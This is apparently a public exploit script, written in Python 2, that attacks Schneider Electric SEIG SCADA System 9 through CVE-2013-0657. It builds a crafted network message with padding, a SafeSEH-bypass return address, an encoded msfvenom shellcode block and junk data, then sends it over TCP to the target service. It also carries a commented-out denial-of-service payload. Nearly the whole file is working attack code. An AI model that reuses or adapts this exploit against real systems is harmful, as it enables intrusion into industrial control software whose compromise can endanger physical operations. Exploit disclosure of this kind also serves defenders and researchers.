SEIG SCADA System 9 - Remote Code Execution

# Title: SEIG SCADA SYSTEM 9 - Remote Code Execution
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage: https://www.schneider-electric.com
# Software Link: https://www.schneider-electric.ie/en/download/document/V9_Full_installation_package_register_and_receive_file/
# Version: v9
# Tested on: Windows7 x86
# CVE: CVE-2013-0657
# References: 
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657

import socket
import struct

ip = "192.168.0.23"
port = 12397
con = (ip, port)

# DoS Payload found in the research (CRUNCHBASE UNEXPECTED PARAMETER)
# length = "\x00\x70\x00\x00\x00\x00\x00\x00"
# message = "\x00\x70AA\x65\x00\x00\x00AAAAAAAAAAAAAAAA\x00\x00\x00\x00"+"B"*28644
# payload = length+message

# Exploit Magic
message_header = struct.pack("<L", 0x6014) + "\x66\x66\x07\x00"
message_protocol_data = "\x10\x00\x00\x00" + "\x19" + "\x00\x00\x00\x00\x00" + "\x04" + "\x00\x00\x00" + struct.pack(">H", 0x6000)
padding = "B" * 3344
eip_safeseh_bypass_address = struct.pack("<L", 0x0F9C520B) # pop, pop, ret to stack payload in exprsrv.dll (Windows Library without SafeSEH)

# Shellcode: ./msfvenom -a x86 --platform windows -p windows/exec cmd=calc EXITFUNC=thread -e x86/shikata_ga_nai -i 5 -b '\x00\xFF\x0A\x0D' -f python
# If EXITFUNC is not defined the application enter in a Loop that kill the VM resources
nopsleed = "\x41"*100 # \x90 bad char bypass
shellcode  = "\xda\xcb\xbd\x0f\x83\x69\x70\xd9\x74\x24\xf4\x58\x31"
shellcode += "\xc9\xb1\x4b\x83\xe8\xfc\x31\x68\x14\x03\x68\x1b\x61"
shellcode += "\x9c\xa9\xcf\xd8\x3a\xb3\x6e\xfc\x1c\x37\x54\xf6\xc7"
shellcode += "\x93\x5d\x47\xb3\xd2\x35\xb1\x3f\x7d\xdc\x42\xd7\x81"
shellcode += "\x59\x48\x93\x7b\x98\x70\x2a\x6b\x98\x14\xea\xc5\x54"
shellcode += "\x17\x7c\x8d\x25\x69\x60\x27\x1e\xc7\x8a\x6a\xd8\xcf"
shellcode += "\xb6\xc3\x9d\x5a\x83\xd6\xea\x88\x14\x7d\x5a\x55\x71"
shellcode += "\x90\x85\xb8\x37\x9e\x3e\xd7\x1a\x76\xf8\xb1\xb9\x63"
shellcode += "\xb7\xef\xa3\xa6\xc0\xb8\x12\xb4\x18\x62\x1a\xe1\x9e"
shellcode += "\x6f\x7e\xa2\x86\x6c\xf7\x3a\x31\xbd\x55\x42\x10\xad"
shellcode += "\x89\x16\xa0\xb8\x6a\xd6\x4c\x20\xd9\xad\x81\x58\x77"
shellcode += "\x0b\xa3\xaa\xba\x2c\x49\xf0\x26\xaa\xab\xce\x5a\xc3"
shellcode += "\x41\x69\x60\xc4\x58\x71\x71\x9c\x3f\xbe\xc2\xbc\x49"
shellcode += "\xdd\xab\x89\xf0\x46\xcb\x1a\x8a\xf1\xdb\xe5\x54\x1f"
shellcode += "\xfb\x30\x3b\xb1\x17\x97\xb2\x3e\x31\xf8\x26\x13\x9c"
shellcode += "\x16\xdd\x26\x7a\xe3\x9b\x6e\x29\x77\x49\xc7\x97\x98"
shellcode += "\x39\x7b\x5f\xcd\xeb\x4a\x39\x6e\x66\x04\xbc\x6c\xa6"
shellcode += "\x87\x01\x63\x4d\xf3\x35\xc9\x74\x35\xdf\xe7\x1f\x0c"
shellcode += "\xd0\x69\x80\x8c\x5c\xde\x63\xfc\x19\x1b\x8e\x24\x3b"
shellcode += "\x7e\x01\x97\x6f\x67\x8f\x07\x3f\x32\x13\x23\x80\x7e"
shellcode += "\x9a\x01\x5a\xc0\x3c\xf9\xf5\x5a\x04\xb0\x54\x46\x0c"
shellcode += "\xfb\x21\x4d\xd7\xe0\xb4\x02\xe5\x4c\x04\x5a\x5e\x37"
shellcode += "\xd1\x61\x6d\xe1\x4d\xe8\xa8\xdf\x26\xdb\x55\x5a\x60"
shellcode += "\x85\x68\x05\x6a\x21\x73\xdf\x73\xa4\xef\x26\x02\x7e"
shellcode += "\xb0\xb1\xa6\xb1\xac\x15\x0f\x80\x34\xae\xe4\x8a"

JUNK = "JUNK"*5202 # 20808 Bytes of JUNK

payload = message_header + message_protocol_data + padding + eip_safeseh_bypass_address + nopsleed + shellcode + JUNK
print "Payload length: "+str(len(payload))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(con)
s.send(payload)
s.recv(10)